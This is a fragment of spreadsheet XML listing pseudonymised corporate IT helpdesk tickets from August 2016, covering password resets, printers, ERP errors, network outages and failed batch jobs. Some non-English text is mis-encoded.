    <t xml:space="preserve">job Job_728 failed in job_scheduler at: 08/31/2016 03:44:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_728 failed in job_scheduler at: 08/31/2016 03:44:00</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ntuhoafg.bzwefjvk@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
please look in to the below screenshot and help to resolve the issue._x000D_
_x000D_
[cid:image001.jpg@01d20389.31ea5790]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>reinstall office2010 \ bctypmjw cbhnxafz</t>
  </si>
  <si>
    <t>probleme mit EU_tool \we_wu106 \xaqzisrk ahbgjrqz</t>
  </si>
  <si>
    <t>xaqzisrk ahbgjrqz</t>
  </si>
  <si>
    <t>please switch of tr telephony_software today from 09:30 to 09:45 cet</t>
  </si>
  <si>
    <t xml:space="preserve">this is last call meeting that was set up by fhtyulvio and all of them have to participate.
if you are not able to do it, and maybe it is even easier, then please remove any abandon that may take place during these 15 mins
</t>
  </si>
  <si>
    <t>djpwfxzt cfkwxlmq</t>
  </si>
  <si>
    <t>last login on company laptop</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: htnvbwxs.gwfrzuex@gmail.com_x000D_
_x000D_
good day._x000D_
_x000D_
please assist:_x000D_
_x000D_
please can you check when/who was the last login was on company laptop ekpl8111112?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>engineering tool not opening</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vsiemxgh.lgeciroy@gmail.com_x000D_
_x000D_
dear sir/mam,_x000D_
_x000D_
kindly refer the below screenshot. my engineering tool is not opening and showing the below error._x000D_
request you to resolve the issue immediately._x000D_
_x000D_
[cid:image001.jpg@01d20383.bbe2d590]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">missrouting of printouts:  check settings if printing invoiuce to printer ag28 / fÃ¼rth and change printer to jc00 / </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tkuivxrn.urdgitsv@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
settings in erp SID_34 system of printing inwarehouse_tool e.g. 0158047476 are wrong (plant_168 to plant_113 shipments)._x000D_
_x000D_
please change setting to printer jc00, due to no requirement to continue printing  these paper in fÃ¼rth = protect the planet._x000D_
_x000D_
many </t>
  </si>
  <si>
    <t>please change password and pin for the EU_tool</t>
  </si>
  <si>
    <t>lgtdheno wfukbdjy</t>
  </si>
  <si>
    <t>stock issue for mm 1021381</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rgtoger.lfgtiu@company.com_x000D_
_x000D_
hello it_x000D_
_x000D_
please help check the issue below, there are 90pcs stock under plant_283, but in code: zme2o, there is 0 stock, so can't run the dn. </t>
  </si>
  <si>
    <t xml:space="preserve">vpn link </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: neoarmgd.meodvbxu@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
i am not able to log on to above network with me windows login credentials._x000D_
_x000D_
_x000D_
please check and resolve, as my work is getting hampered._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ooo : !3.09.2016issues with mailbox " company"</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: fbyusmxz.kxvmcbly@gmail.com
hello,
i am owner of the common mailbox " company"
i have created a new folder "xxxxx" under the folder inbox for uacyltoe hxgayczeing.
[cid:image001.png@01d2035c.6d1b0e90]
all other members of this shared mailbox can not see the folder "xxxxx" and i can not delete it anymore.
i can click on "delete folder" and get no error message, but the folder is still thereâ€¦
also other members have created folders under the folder inbox â€“ e.g. soedjitv wvprteja (scherfgpd) has created the folder "uacyltoe hxgaycze2".
the folder "uacyltoe hxgaycze2" is only visible for her.
also for me â€“ as the owner â€“ the folder is not visible.
something is wrong with this mailbox.
could you please check.
</t>
  </si>
  <si>
    <t>vfx3 - 1417 - foreign trade data missing</t>
  </si>
  <si>
    <t xml:space="preserve">dear it team,_x000D_
_x000D_
i checked this morning vfx3, unfortunately, there are still 4 entries, where i do not know what to do._x000D_
can you please check?_x000D_
inwarehouse_tool 0158898835: pricing error_x000D_
inwarehouse_tools 0158947538, 0158027980 and 0158027991: i completed the foreign trade data, but the error is still coming. _x000D_
_x000D_
as we have months end, we need to fix this today._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ç”µè„‘è¿è¡Œé€Ÿåº¦è¶…çº§æ…¢ï¼Œæ‰“å¼€ä¸€ä¸ªerpæ–°çš„ç•Œé¢å’Œæ‰“å¼€officeæ–‡ä»¶éƒ½éœ€è¦5ç§’é’Ÿä»¥ä¸Šã€‚è½¬è´ºæ­£å¹³</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: tuqrvowp.fxmzkvqo@gmail.com
hello team,
ç”µè„‘è¿è¡Œé€Ÿåº¦è¶…çº§æ…¢ï¼Œæ‰“å¼€ä¸€ä¸ªerpæ–°çš„ç•Œé¢å’Œæ‰“å¼€officeæ–‡ä»¶éƒ½éœ€è¦5ç§’é’Ÿä»¥ä¸Šã€‚è½¬è´ºæ­£å¹³
tuqrvowp fxmzkvqo é’±å”é‘«
human resources
tuqrvowp.fxmzkvqo@gmail.com&lt;mailto:tuqrvowp.fxmzkvqo@gmail.com&gt;
</t>
  </si>
  <si>
    <t>wifi disconnecting</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: puxiomgy.ndjorwab@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am puxiomgy ndjorwab from india branch._x000D_
i am facing issue of wi-fi network disconnecting every 5-10 mins when seated at 2nd floor admin building._x000D_
request you to arrange to resolve at the earliest._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>puxiomgy ndjorwab</t>
  </si>
  <si>
    <t>circuit outage:usa nc vpn circuit is down at 12:32 am et on 08/31. site is up on primary circuit.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________12:32 am et on 08/31______________x000D_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_____yes___     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____na_______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</si>
  <si>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mii password reset &amp; unlock account</t>
  </si>
  <si>
    <t>vlnjxdyk usgyfoit</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to erp </t>
  </si>
  <si>
    <t xml:space="preserve">please process the billing accounting (0372101858) in erp. </t>
  </si>
  <si>
    <t>data card</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dwujlnhs.ecxvrpyl@gmail.com_x000D_
_x000D_
dear sir_x000D_
_x000D_
i have received new system, but there is no data card along with that._x000D_
kindly arrange to send me data card._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dwujlnhs.ecxvrpyl@gmail.com_x000D_
_x000D_
dear sir_x000D_
_x000D_
i had received new system last week. there was no engineering tool, i downloaded engineering tool but unable to see my old uploaded reports kindly resolve._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>assignment field for edi posting</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ihfkwzjd.erbxoyqk@gmail.com_x000D_
_x000D_
dear it team_x000D_
_x000D_
i found that dn number has not been shown on assignment field for edi posting transaction as below. what is the changes or error on this? please confirm_x000D_
we need to use dn number to do intercompany reconciliation on the month end process._x000D_
_x000D_
_x000D_
[cid:image001.jpg@01d2037a.adf650a0]_x000D_
_x000D_
[cid:image002.jpg@01d2037a.adf650a0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">kindly replace the mouse as it is not working </t>
  </si>
  <si>
    <t>engineering_toolä¸Šä¼ ä¸äº†</t>
  </si>
  <si>
    <t>æŠ¥è­¦æ˜¾ç¤ºæ²¡æœ‰å»ºç«‹ç½‘ç»œè¿žæŽ¥ï¼Œä½†æ˜¯vpnå·²ç»è¿žæŽ¥ã€‚_x000D_
ä¿®æ”¹å®Œå¯†ç ä¹‹åŽå°±ä¸Šä¼ ä¸äº† äº†</t>
  </si>
  <si>
    <t>omgqwuae utbrfyzq</t>
  </si>
  <si>
    <t>SID_1 erp uacyltoe hxgaycze - login issue &amp; password reset.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ilbkhgxd.hirsqytd@gmail.com_x000D_
_x000D_
help desk_x000D_
_x000D_
following issue is faced when i was trying to login in SID_1 erp uacyltoe hxgaycze.  please go through below screen shot &amp; do the needful._x000D_
_x000D_
[cid:image004.png@01d20366.2d0ed520][cid:image005.png@01d20366.2d0ed520][cid:image003.png@01d20365.ffbcf700]_x000D_
_x000D_
since i used this system long back i would like to request you to do password reset. please do the needful at the earliest._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">windows password reset </t>
  </si>
  <si>
    <t>yrzvhbic rechmoiy</t>
  </si>
  <si>
    <t>wmsaxylo tyqgpkxz</t>
  </si>
  <si>
    <t xml:space="preserve">abend batch job  Job_3028 failed in job_scheduler at: 08/30/2016 22:02:23 </t>
  </si>
  <si>
    <t>job name:Job_3028 failed in job_scheduler</t>
  </si>
  <si>
    <t xml:space="preserve"> mii password reset &amp; unlock account</t>
  </si>
  <si>
    <t>qgwypesz fzsdnmrk</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_549 failed in job_scheduler at: 08/30/2016 22:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_549 failed in job_scheduler at: 08/30/2016 22:30:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_50filesys failed in job_scheduler at: 08/30/2016 22:09:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_50filesys failed in job_scheduler at: 08/30/2016 22:09:00</t>
  </si>
  <si>
    <t>when i create a recurring appointment in mds i get an error record is unavailable</t>
  </si>
  <si>
    <t xml:space="preserve">when i create a recurring appointment in mds i get an error record is unavailable. this occurred in uacyltoe hxgaycze. see attachment_x000D_
</t>
  </si>
  <si>
    <t>i paid to vendor (2111101830) in aug.29.2016,  but i don't  clear this vendor in t-code (f-53).</t>
  </si>
  <si>
    <t>i paid to vendor (2111101830) in aug.29.2016,  but i don't  clear this vendor in t-code (f-53). erp show: no open items were found,but it has item in t-code (fbl1n) .</t>
  </si>
  <si>
    <t>my outlook and skype does not work when i am at home. it only works in the office.</t>
  </si>
  <si>
    <t>name:callie pollaurid
language:
browser:microsoft internet explorer
email:xzupryaf.vlbikhsm@gmail.com
customer number:
telephone:724
summary:my outlook and skype does not work when i am at home. it only works in the office.</t>
  </si>
  <si>
    <t>skype ä¸èƒ½ç™»å½•ï¼Œæç¤ºè¯ä¹¦é”™è¯¯ã€‚</t>
  </si>
  <si>
    <t>system not responding</t>
  </si>
  <si>
    <t>it assistance</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: oydlehun.svnfrxdk@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i'm putting up this it ticket on behalf of nzuofeam exszgtwd whose notebook cannot boot up due to hardware failure._x000D_
_x000D_
please assist immediately. </t>
  </si>
  <si>
    <t>multiple display not working</t>
  </si>
  <si>
    <t>erp account unlock</t>
  </si>
  <si>
    <t>tablet not booting</t>
  </si>
  <si>
    <t>mfkibqgu rdvfzeba</t>
  </si>
  <si>
    <t>log in permissions not working.  need to change password also.  please call me</t>
  </si>
  <si>
    <t xml:space="preserve">name:etlfrucw ziewxqof
language:
browser:microsoft internet explorer
email:etlfrucw.ziewxqof@gmail.com
customer number:
telephone:519
summary:log in permissions not working.  need to change password also.  please call me
ic
 welcome, our next available agent will be with you shortly...
 interaction alerting agent.
 website visitor has joined the conversation
rakthyesh ramdntythanjesh
 hi dartvis
 </t>
  </si>
  <si>
    <t>etlfrucw ziewxqof</t>
  </si>
  <si>
    <t>ä¸»æœºä¸èƒ½å¼€å¯</t>
  </si>
  <si>
    <t>ä¸»æœºä¸èƒ½å¼€å¯ï¼Œç”µæºç¯æ­£å¸¸ï¼Œä¸»æœºé¢æ¿1ã€3æŒ‡ç¤ºç¯å¸¸äº®</t>
  </si>
  <si>
    <t>cpdilmjx jwsqpiac</t>
  </si>
  <si>
    <t>æ‰“å¼€office 2013æ˜¾ç¤ºæ˜¯æœªç»æŽˆæƒäº§å“</t>
  </si>
  <si>
    <t>æ‰“å¼€outlookã€pptæ˜¾ç¤ºæ˜¯æœªç»æŽˆæƒäº§å“,æœ›è§£å†³ã€‚</t>
  </si>
  <si>
    <t>hbvwqine eakqyovu</t>
  </si>
  <si>
    <t>network outage: russia - warehouse network is down since 6:30pm et on 08/30/2016</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________6:30pm et on 08/30/2016_____________x000D_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____na____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____no_____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</si>
  <si>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circuit outage at milan, it- divestiture since 8pm et 08/30. site is on primary.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ___8pm et 08/30___________________x000D_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____yes____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____yes_____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ___________   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ___________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</si>
  <si>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login to mii issue.</t>
  </si>
  <si>
    <t>xdcpmtfn xzvbjhlc</t>
  </si>
  <si>
    <t>email &amp; calendar on my phone</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tjlizqgc.ngvwoukp@gmail.com_x000D_
_x000D_
i just received a replacement of my company supplied phone. i have set it up but need for it to be given access to my email, contacts and calendar.  if this is not the right place to make this request please let me know.  </t>
  </si>
  <si>
    <t>tjlizqgc ngvwoukp</t>
  </si>
  <si>
    <t>expense report</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ytqhfmwi.itnakpmc@gmail.com
my expense report will not submit to my manager, it only saves. please submit. this has happened on all my expense reports.
[cid:image001.jpg@01d202d8.cf36c3f0]
michjnfyele l. jenhntyns
plant manager
ytqhfmwi.itnakpmc@gmail.com&lt;mailto:ytqhfmwi.itnakpmc@gmail.com&gt;
</t>
  </si>
  <si>
    <t>GRP_68</t>
  </si>
  <si>
    <t>folder access for jywvemun qngschtz</t>
  </si>
  <si>
    <t xml:space="preserve">from: nwfodmhc exurcwkm _x000D_
sent: wednesday, august 31, 2016 2:28 am_x000D_
to: naruedlk mpvhakdq_x000D_
cc: jywvemun qngschtz; weszfyok fbadnjhu_x000D_
subject: re: wg: br reporting - juni und juli-zahlen fÃ¼r zeitkonten und urlaubsstÃ¤nde fehlen_x000D_
_x000D_
hi simfghon,_x000D_
_x000D_
kindly note that there are multiple folders under \\eagcldaten\teams\br reporting\_x000D_
_x000D_
please mention which specific folder access has to be given._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>password reset for xhaomnjl ctusaqpr</t>
  </si>
  <si>
    <t xml:space="preserve">password reset request </t>
  </si>
  <si>
    <t>ticket update on inplant_855685</t>
  </si>
  <si>
    <t>can't add a note to an account on the mobile</t>
  </si>
  <si>
    <t>can't add a note to an account on the mobile.  i wanted to be able to demonstrate this in a meeting tomorrow but this error is blocking the ability to add a note.</t>
  </si>
  <si>
    <t>stock transfer pricing error - intercompnay inwarehouse_tool did not reverse</t>
  </si>
  <si>
    <t>they reversed the intercompany shipment but the intercompany inwarehouse_tool did not reverse. i ran the billing document tables and do not see the reversal there either._x000D_
(see attached email)</t>
  </si>
  <si>
    <t>unable to print from dv28</t>
  </si>
  <si>
    <t>hwcisuvt omepbihv</t>
  </si>
  <si>
    <t>can you tell me the phone number for office 44 at the usx tower?</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: azxhejvq.fyemlavd@gmail.com
mikhghytr wafglhdrhjop
sr. manager, global ethics and compliance programdntys
</t>
  </si>
  <si>
    <t>login script pop up query</t>
  </si>
  <si>
    <t>ticket update on inplant_855239</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1359 failed in job_scheduler at: 08/30/2016 15:01:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1359 failed in job_scheduler at: 08/30/2016 15:01:00</t>
  </si>
  <si>
    <t>install project 2013 for petrhyr</t>
  </si>
  <si>
    <t>vip2: printer setup</t>
  </si>
  <si>
    <t>ozfjeqml xiujacyn</t>
  </si>
  <si>
    <t>outlook not connected to server &amp; having queries on connecting to external monitors</t>
  </si>
  <si>
    <t>printer new driver update needed</t>
  </si>
  <si>
    <t>name:kaguhxwo uoyipxqg
language:
browser:microsoft internet explorer
email:kaguhxwo.uoyipxqg@gmail.com
customer number:
telephone:172
summary:printer new driver update needed</t>
  </si>
  <si>
    <t xml:space="preserve">engineering tool locked out </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nabjpdhy.bjuqwidt@gmail.com
hello
i changed my passwords and i tried to log onto engineering tool and it says too many failed attempted. see attached screenshot.
stefyty hunt
prototype tech, product engineering
nabjpdhy.bjuqwidt@gmail.com&lt;mailto:nabjpdhy.bjuqwidt@gmail.com&gt;
</t>
  </si>
  <si>
    <t>pzkxsnmv aoybmnzw</t>
  </si>
  <si>
    <t>password reset to annette</t>
  </si>
  <si>
    <t>windows asks to install driver and then won't allow me to print</t>
  </si>
  <si>
    <t>please complete all required questions below.  _x000D_
if not, it will be returned back to the gsc / requester to provide required information_x000D_
_x000D_
 â€¢  gsc to review ticket, if not able to resolve then please assign to appropriate group per your printer problem assignment flowchart._x000D_
_x000D_
   â€¢  printer name / make - model?  (all printers - even local) _x000D_
 _x000D_
   â€¢  detailed description of the problem ?  windows needs to download and install a software driver from the ??HostName_769 computer to print to cl05.  (same message for all printers)_x000D_
_x000D_
   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000D_
      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)  all documents will not print from any source_x000D_
_x000D_
   â€¢  what system or application being used at time of the problem?     outlook, excel, erp - all of them_x000D_
   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed?  shutdown computer and printer.  same error message._x000D_
_x000D_
   â€¢  if erp system, which system?   (ex SID_34 / SID_38 / hrp / plm) - all _x000D_
_x000D_
      â€¢  if it's an erp printer problem can the erp output be rerouted to another erp printer temporarily?_x000D_
         what printer can it be rerouted too? _x000D_
_x000D_
   â€¢  if document is not printing correctly, please scan copy of the document and attach to the ticketing_tool ticket.</t>
  </si>
  <si>
    <t>office 365 activation on corporate phone</t>
  </si>
  <si>
    <t>request to reset microsoft online services password for pvtiqgsh.orlzgfsx@gmail.com</t>
  </si>
  <si>
    <t>pvtiqgsh orlzgfsx</t>
  </si>
  <si>
    <t>delete print jobs on prtqc4604</t>
  </si>
  <si>
    <t>ariovxlm gesyftvm</t>
  </si>
  <si>
    <t>i changed my password and now cant sign into skype</t>
  </si>
  <si>
    <t>name:mikhghytr 
language:
browser:microsoft internet explorer
email:vcyktjxp.uxdojvrq@gmail.com
customer number:
telephone:971
summary:i changed my password and now cant sign into skype</t>
  </si>
  <si>
    <t>eror message on refreshing the bex analysis. error atached.</t>
  </si>
  <si>
    <t>eror message on refreshing the bex analysis. error atached.
phone: 724</t>
  </si>
  <si>
    <t>hr_tool queries for former employee : hanghdyle</t>
  </si>
  <si>
    <t>re: ticket_no1538811::company center authorization</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zdnqowag.cdtyonhw@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
this is approved._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>zdnqowag cdtyonhw</t>
  </si>
  <si>
    <t>ticket update for inplant_855685</t>
  </si>
  <si>
    <t>request for temporary access to f.80 mass reversal</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rhwsmefo.tvphyura@gmail.com_x000D_
_x000D_
hello.  i need to request 1 week temporary access to f.80 in erp SID_34 to correct duplicate payments in erp. </t>
  </si>
  <si>
    <t>problem with erp not updating orders after getting picked through warehouse_tool</t>
  </si>
  <si>
    <t>ticket update for inplant_855671</t>
  </si>
  <si>
    <t>outlook not launching._x000D_
-connected to the user system using teamviewer._x000D_
-reconfigured the mscrm._x000D_
-caller confirmed that he is now able to see the emails on outlook._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>ticket update regarding ticket_no1543461 from tqvpohwj tbkywpqz</t>
  </si>
  <si>
    <t>need to map/add network printer</t>
  </si>
  <si>
    <t xml:space="preserve">jerghjemiah brock, your windows password is expiring soon!!i need assistance resetting my password. </t>
  </si>
  <si>
    <t>mgcivbtx bshmfxya</t>
  </si>
  <si>
    <t xml:space="preserve">unable to send email to hrscc team from external email address </t>
  </si>
  <si>
    <t>imzctxhr odmawbij</t>
  </si>
  <si>
    <t>all permissions for discounts has been removed for znq,zno,znr, zns need to be restored for the whole mti team</t>
  </si>
  <si>
    <t>uajiymhe qyrwfkvz</t>
  </si>
  <si>
    <t>unable to launch erp. logon balancing error</t>
  </si>
  <si>
    <t>zehrwlbt sdyltvnp</t>
  </si>
  <si>
    <t>ticket update on ticket_no0434826</t>
  </si>
  <si>
    <t>please identify source user involved in processing deletion of terminated user</t>
  </si>
  <si>
    <t xml:space="preserve">from: ugyothfz ugrmkdhx 
sent: tuesday, august 30, 2016 8:21 pm
to: zkevitua nesbfirjeerabhadrappa &lt;zkevitua.nesbfirj@gmail.com&gt;
cc: hnynhsth jsuyhwssad &lt;bxspwfyo.vzystwor@gmail.com&gt;
subject: rjtnlocs fclswxkz (tanrgty)
hello aghynil,
request your assistance in identifying the source user who processed the deletion of the terminated user (in subject). let me know if you need a sn ticket to be created. </t>
  </si>
  <si>
    <t>HostName_1007:  volume consumed on c:\ disk is more than 85%.</t>
  </si>
  <si>
    <t xml:space="preserve">email delegation </t>
  </si>
  <si>
    <t>rqxmaindept ad account keeps getting locked.  please unlock.</t>
  </si>
  <si>
    <t>kuiglfqa rwutnibm</t>
  </si>
  <si>
    <t xml:space="preserve">skype login issue </t>
  </si>
  <si>
    <t>:440-
summary:unable to log into skype after password change yesterday.</t>
  </si>
  <si>
    <t>dskcobqa tujrvsbc</t>
  </si>
  <si>
    <t xml:space="preserve">outlook issue </t>
  </si>
  <si>
    <t>konto scghhnell reaktivieren- laptop ewel7212519</t>
  </si>
  <si>
    <t>collaboration_platform emails</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fgsmwvcp.uoxkzwes@gmail.com_x000D_
_x000D_
it:_x000D_
mhtyike szumyhtulas is receiving the attached emails._x000D_
these employees do not report to him. please advise why he is receiving these?_x000D_
</t>
  </si>
  <si>
    <t>need to configure printer</t>
  </si>
  <si>
    <t>qtgefsdk bytvlnca</t>
  </si>
  <si>
    <t>xpugzdvk xiawvmfp</t>
  </si>
  <si>
    <t>unable to boot laptop</t>
  </si>
  <si>
    <t>erp SID_34 password reset done. confirmed with user.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1953b failed in job_scheduler at: 08/30/2016 10:18:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1953b failed in job_scheduler at: 08/30/2016 10:18:00</t>
  </si>
  <si>
    <t>need to setup exchange on corporate iphone</t>
  </si>
  <si>
    <t>nsgeatyf qbyfiajo</t>
  </si>
  <si>
    <t>inc1544821 - ticket update</t>
  </si>
  <si>
    <t>unable to launch engineering_tool</t>
  </si>
  <si>
    <t>awcgpyeh hlavbsjf</t>
  </si>
  <si>
    <t>ç­”å¤: ticket_no1538811::company center authorization</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: udzkgbwl.bgpedtqc@gmail.com
hello rubiargty
need access same as karghyuen.
best </t>
  </si>
  <si>
    <t>udzkgbwl bgpedtqc</t>
  </si>
  <si>
    <t>problemas de configuraÃ§Ã£o no quick quote</t>
  </si>
  <si>
    <t>as imagens nÃ£o alteramdnty quando solicitadas dificultando assim a cotaÃ§Ã£o de ferramdntyentas especiais.</t>
  </si>
  <si>
    <t>zpfitlyu cemvwyso</t>
  </si>
  <si>
    <t xml:space="preserve">mapping network </t>
  </si>
  <si>
    <t>hjxdkwtr jzeuyfdp</t>
  </si>
  <si>
    <t>palghjmal1 is not able to run softland client through citrix</t>
  </si>
  <si>
    <t>qohfjpna exphkims (palghjmal1) is not able to run softland client through citrix. it shows an error when loading the application._x000D_
please see attached error. i have uacyltoe hxgayczeed from other pc's and got same problem.</t>
  </si>
  <si>
    <t>qohfjpna exphkims</t>
  </si>
  <si>
    <t>install shop_floor_app on my machine</t>
  </si>
  <si>
    <t>outlook cache email query.</t>
  </si>
  <si>
    <t>qicmfaoe hdrysife</t>
  </si>
  <si>
    <t>new cpp id can not request initiative.  see image attached</t>
  </si>
  <si>
    <t xml:space="preserve">cphlme01_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rubiargty.fatgrtyma@company.com
hello cathytyma,
update the position title as per request. regarding access please provide copy access person's name.
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: udzkgbwl.bgpedtqc@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
i'm still waiting for problem resolve. please advise who's approval you still need, or when i can have access._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">whenever i open an email with a jpg attachement i always get a security warning&gt; </t>
  </si>
  <si>
    <t>hitakmbs fvhmkntq</t>
  </si>
  <si>
    <t xml:space="preserve">all of the presentations posted for drive this week are not appearing on the approval page.  </t>
  </si>
  <si>
    <t>all of the presentations posted for drive this week are not appearing on the approval page.  tomashtgd mchectg likes to use the approval page to navigate around the presentations, so i'm sure he will notice it is not working correctly._x000D_
_x000D_
see attached file for details and urls.</t>
  </si>
  <si>
    <t>i can not print.  it is asking me to install a print driver</t>
  </si>
  <si>
    <t>i can not print.  it is asking me to install a print driver_x000D_
_x000D_
i can not print.  it is asking me to install a print driver_x000D_
i did with nothing happened</t>
  </si>
  <si>
    <t>reset passwords for cpmaidhj elbaqmtp using password_management_tool password reset.</t>
  </si>
  <si>
    <t>cpmaidhj elbaqmtp</t>
  </si>
  <si>
    <t>erp salary statement</t>
  </si>
  <si>
    <t xml:space="preserve">my lauacyltoe hxgaycze salary statement was on 6/30/2016.  i am continuing to get paychecks, just unable to see salary statement in erp.  have been going through the hub._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>s&amp;op</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: uyrpdvoq.mbzevtcx@gmail.com
could you please reset my password
uyrpdvoq mbzevtcx
sales manager earthworks european served area â€“ north
uyrpdvoq.mbzevtcx@gmail.com&lt;mailto:uyrpdvoq.mbzevtcx@gmail.com&gt;
company infrastructure gmbh
geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx und naruedlk mpvhakdq
www.company.com&lt;
</t>
  </si>
  <si>
    <t>ess access for user ghaltiek lsuepvyx (yesilc)</t>
  </si>
  <si>
    <t>ess access for user ghaltiek lsuepvyx. please find error message attached.
phone: 0157</t>
  </si>
  <si>
    <t>'repeat outbound connection for 135/tcp</t>
  </si>
  <si>
    <t>user id dalgtylam place in quarantine_x000D_
_x000D_
we are seeing your 80.71.06.702/company-european-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from edml8111119/10.16.143.33 to port 135/tcp (remote procedure call (rpc)) of external host 31.199.53.10. this may indicate a misconfiguration, where the firewall is blocking traffic to a legitimate server/application. this may also indicate a compromised host reaching out to a malicious host or propagating worm code.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1) full escalation for windows login failure alerts (explicit notification via a high priority ticket and a phone call) 2) automatically resolve windows login failure alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)</t>
  </si>
  <si>
    <t>GRP_69</t>
  </si>
  <si>
    <t xml:space="preserve">erp training queries </t>
  </si>
  <si>
    <t>lqophnis rcmepgvq</t>
  </si>
  <si>
    <t>problem with office365.com</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zywoxerf.paqxtrfk@gmail.com
dear help desk:
my office365 always gives me a blank page, see below for a screen shot. please help.
[cid:image001.png@01d20292.c6465901]
x.  jdamieul  fandyhgg
phd, us
senior staff engineer
zywoxerf.paqxtrfk@gmail.com&lt;mailto:zywoxerf.paqxtrfk@gmail.com&gt;
</t>
  </si>
  <si>
    <t>repeat outbound connection for 135/tcp</t>
  </si>
  <si>
    <t>user zhengdr placed in palo_virus_quarantine_x000D_
_x000D_
incident overview_x000D_
=========================_x000D_
we are seeing your 54.96.80.216/att-apac-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from aenl8811417/12.41.82.81268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</si>
  <si>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kzjtvbaf nskfwlvo</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1314 failed in job_scheduler at: 08/30/2016 08:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1314 failed in job_scheduler at: 08/30/2016 08:20:00</t>
  </si>
  <si>
    <t>logon error in erp SID_1</t>
  </si>
  <si>
    <t>yvzegwph xgzwiqta</t>
  </si>
  <si>
